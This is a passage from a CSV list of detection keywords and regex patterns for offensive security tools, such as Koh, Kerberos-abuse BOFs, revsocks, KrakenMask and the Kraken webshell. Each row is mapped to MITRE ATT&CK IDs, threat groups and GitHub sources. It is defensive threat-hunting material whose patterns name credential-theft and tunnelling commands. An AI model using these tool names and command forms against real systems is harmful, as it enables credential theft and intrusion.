Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh release LUID*",".{0,1000}koh\srelease\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe capture*",".{0,1000}Koh\.exe\scapture.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe list*",".{0,1000}Koh\.exe\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe monitor*",".{0,1000}Koh\.exe\smonitor.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*kost/revsocks*",".{0,1000}kost\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*kpcyrd/badtouch*",".{0,1000}badtouch.{0,1000}","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - 
T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","4","385","46","2023-12-19T14:50:40Z","2018-03-15T22:27:56Z" "*kpfopkelmapcoipemfendmdcghnegimn*",".{0,1000}kpfopkelmapcoipemfendmdcghnegimn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*KPortScan.exe*",".{0,1000}KPortScan\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan.rar*",".{0,1000}KPortScan\.rar.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan.zip*",".{0,1000}KPortScan\.zip.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan3.exe*",".{0,1000}KPortScan3\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*krackattacks*",".{0,1000}krackattacks.{0,1000}","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test 
if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","10","3289","768","2024-02-22T09:32:42Z","2017-10-18T12:58:08Z" "*Kraken Mask by @DallasFR*",".{0,1000}Kraken\sMask\sby\s\@DallasFR.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*kraken.py --connect --mode * --profile * --compiler *",".{0,1000}kraken\.py\s\-\-connect\s\-\-mode\s.{0,1000}\s\-\-profile\s.{0,1000}\s\-\-compiler\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Kraken-1.2.0.zip*",".{0,1000}Kraken\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*KrakenMask-main*",".{0,1000}KrakenMask\-main.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep 
obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*kraken-ng/Kraken*",".{0,1000}kraken\-ng\/Kraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*krb_asktgs /*",".{0,1000}krb_asktgs\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_asktgt /*",".{0,1000}krb_asktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_asreproasting*",".{0,1000}krb_asreproasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_changepw /*",".{0,1000}krb_changepw\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*KRB_CRED kirbi *",".{0,1000}KRB_CRED\skirbi\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KRB_CRED(kirbiBytes)*",".{0,1000}KRB_CRED\(kirbiBytes\).{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*krb_cross_s4u /*",".{0,1000}krb_cross_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_describe /*",".{0,1000}krb_describe\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_dump /*",".{0,1000}krb_dump\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_hash /password*",".{0,1000}krb_hash\s\/password.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_klist /*",".{0,1000}krb_klist\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_ptt /ticket:*",".{0,1000}krb_ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_purge /*",".{0,1000}krb_purge\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_renew /ticket:*",".{0,1000}krb_renew\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 